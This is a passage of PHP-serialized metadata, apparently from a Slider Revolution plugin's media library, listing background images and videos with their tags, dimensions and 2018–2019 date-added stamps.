\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:348;a:13:{s:2:\"id\";s:3:\"490\";s:6:\"handle\";s:17:\"Feet-and-Sand.jpg\";s:5:\"video\";s:17:\"Feet-and-Sand.mp4\";s:4:\"name\";s:14:\"Feet and Sand \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:349;a:13:{s:2:\"id\";s:3:\"489\";s:6:\"handle\";s:9:\"Ocean.jpg\";s:5:\"video\";s:9:\"Ocean.mp4\";s:4:\"name\";s:6:\"Ocean \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:350;a:13:{s:2:\"id\";s:3:\"488\";s:6:\"handle\";s:9:\"Waves.jpg\";s:5:\"video\";s:9:\"Waves.mp4\";s:4:\"name\";s:6:\"Waves \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:351;a:13:{s:2:\"id\";s:3:\"487\";s:6:\"handle\";s:10:\"Hearts.jpg\";s:5:\"video\";s:10:\"Hearts.mp4\";s:4:\"name\";s:7:\"Hearts \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:352;a:13:{s:2:\"id\";s:3:\"486\";s:6:\"handle\";s:12:\"Octagons.jpg\";s:5:\"video\";s:12:\"Octagons.mp4\";s:4:\"name\";s:9:\"Octagons \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:353;a:13:{s:2:\"id\";s:3:\"485\";s:6:\"handle\";s:11:\"Squares.jpg\";s:5:\"video\";s:11:\"Squares.mp4\";s:4:\"name\";s:8:\"Squares \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:354;a:13:{s:2:\"id\";s:3:\"484\";s:6:\"handle\";s:12:\"Pink-ink.jpg\";s:5:\"video\";s:12:\"Pink-ink.mp4\";s:4:\"name\";s:9:\"Pink ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:355;a:13:{s:2:\"id\";s:3:\"483\";s:6:\"handle\";s:22:\"Blurred-Background.jpg\";s:5:\"video\";s:22:\"Blurred-Background.mp4\";s:4:\"name\";s:19:\"Blurred Background \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:356;a:13:{s:2:\"id\";s:3:\"482\";s:6:\"handle\";s:20:\"Blinking-bubbles.jpg\";s:5:\"video\";s:20:\"Blinking-bubbles.mp4\";s:4:\"name\";s:17:\"Blinking bubbles \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:357;a:13:{s:2:\"id\";s:3:\"481\";s:6:\"handle\";s:13:\"Fireworks.jpg\";s:5:\"video\";s:13:\"Fireworks.mp4\";s:4:\"name\";s:10:\"Fireworks \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:358;a:13:{s:2:\"id\";s:3:\"480\";s:6:\"handle\";s:12:\"Dark-ink.jpg\";s:5:\"video\";s:12:\"Dark-ink.mp4\";s:4:\"name\";s:9:\"Dark ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:369;a:13:{s:2:\"id\";s:3:\"339\";s:6:\"handle\";s:19:\"best_price_dark.jpg\";s:5:\"video\";s:19:\"best_price_dark.mp4\";s:4:\"name\";s:15:\"best_price_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"best_price_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:370;a:13:{s:2:\"id\";s:3:\"337\";s:6:\"handle\";s:27:\"limited_time_offer_dark.jpg\";s:5:\"video\";s:27:\"limited_time_offer_dark.mp4\";s:4:\"name\";s:23:\"limited_time_offer_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:23:\"limited_time_offer_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:371;a:13:{s:2:\"id\";s:3:\"336\";s:6:\"handle\";s:26:\"slider_revolution_dark.jpg\";s:5:\"video\";s:26:\"slider_revolution_dark.mp4\";s:4:\"name\";s:22:\"slider_revolution_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:22:\"slider_revolution_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:372;a:13:{s:2:\"id\";s:3:\"335\";s:6:\"handle\";s:19:\"mick_brown_dark.jpg\";s:5:\"video\";s:19:\"mick_brown_dark.mp4\";s:4:\"name\";s:15:\"mick_brown_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"mick_brown_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:373;a:13:{s:2:\"id\";s:3:\"334\";s:6:\"handle\";s:14:\"sales_dark.jpg\";s:5:\"video\";s:14:\"sales_dark.mp4\";s:4:\"name\";s:10:\"sales_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:10:\"sales_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:374;a:13:{s:2:\"id\";s:3:\"333\";s:6:\"handle\";s:21:\"robert_smith_dark.jpg\";s:5:\"video\";s:21:\"robert_smith_dark.mp4\";s:4:\"name\";s:17:\"robert_smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"robert_smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:375;a:13:{s:2:\"id\";s:3:\"332\";s:6:\"handle\";s:21:\"product_name_dark.jpg\";s:5:\"video\";s:21:\"product_name_dark.mp4\";s:4:\"name\";s:17:\"product_name_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"product_name_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:376;a:13:{s:2:\"id\";s:3:\"331\";s:6:\"handle\";s:21:\"high_quality_dark.jpg\";s:5:\"video\";s:21:\"high_quality_dark.mp4\";s:4:\"name\";s:17:\"high_quality_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"high_quality_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:377;a:13:{s:2:\"id\";s:3:\"330\";s:6:\"handle\";s:24:\"robert_johnson_light.jpg\";s:5:\"video\";s:24:\"robert_johnson_light.mp4\";s:4:\"name\";s:20:\"robert_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"robert_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:378;a:13:{s:2:\"id\";s:3:\"329\";s:6:\"handle\";s:21:\"jake_collins_dark.jpg\";s:5:\"video\";s:21:\"jake_collins_dark.mp4\";s:4:\"name\";s:17:\"jake_collins_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"jake_collins_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:379;a:13:{s:2:\"id\";s:3:\"328\";s:6:\"handle\";s:22:\"daniele_wood_light.jpg\";s:5:\"video\";s:22:\"daniele_wood_light.mp4\";s:4:\"name\";s:18:\"daniele_wood_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"daniele_wood_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:31:30\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:380;a:13:{s:2:\"id\";s:3:\"327\";s:6:\"handle\";s:23:\"michael_blake_light.jpg\";s:5:\"video\";s:23:\"michael_blake_light.mp4\";s:4:\"name\";s:19:\"michael_blake_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"michael_blake_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:381;a:13:{s:2:\"id\";s:3:\"326\";s:6:\"handle\";s:22:\"product_name_light.jpg\";s:5:\"video\";s:22:\"product_name_light.mp4\";s:4:\"name\";s:18:\"product_name_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"product_name_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:382;a:13:{s:2:\"id\";s:3:\"325\";s:6:\"handle\";s:24:\"rebecca_cooper_light.jpg\";s:5:\"video\";s:24:\"rebecca_cooper_light.mp4\";s:4:\"name\";s:20:\"rebecca_cooper_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"rebecca_cooper_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:383;a:13:{s:2:\"id\";s:3:\"324\";s:6:\"handle\";s:28:\"limited_time_offer_light.jpg\";s:5:\"video\";s:28:\"limited_time_offer_light.mp4\";s:4:\"name\";s:24:\"limited_time_offer_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:24:\"limited_time_offer_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:384;a:13:{s:2:\"id\";s:3:\"322\";s:6:\"handle\";s:22:\"jake_michael_light.jpg\";s:5:\"video\";s:22:\"jake_michael_light.mp4\";s:4:\"name\";s:18:\"jake_michael_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"jake_michael_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:385;a:13:{s:2:\"id\";s:3:\"321\";s:6:\"handle\";s:23:\"colin_johnson_light.jpg\";s:5:\"video\";s:23:\"colin_johnson_light.mp4\";s:4:\"name\";s:19:\"colin_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"colin_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:386;a:13:{s:2:\"id\";s:3:\"320\";s:6:\"handle\";s:21:\"colin_morris_dark.jpg\";s:5:\"video\";s:21:\"colin_morris_dark.mp4\";s:4:\"name\";s:17:\"colin_morris_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"colin_morris_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:387;a:13:{s:2:\"id\";s:3:\"319\";s:6:\"handle\";s:22:\"justin_cooper_dark.jpg\";s:5:\"video\";s:22:\"justin_cooper_dark.mp4\";s:4:\"name\";s:18:\"justin_cooper_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"justin_cooper_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 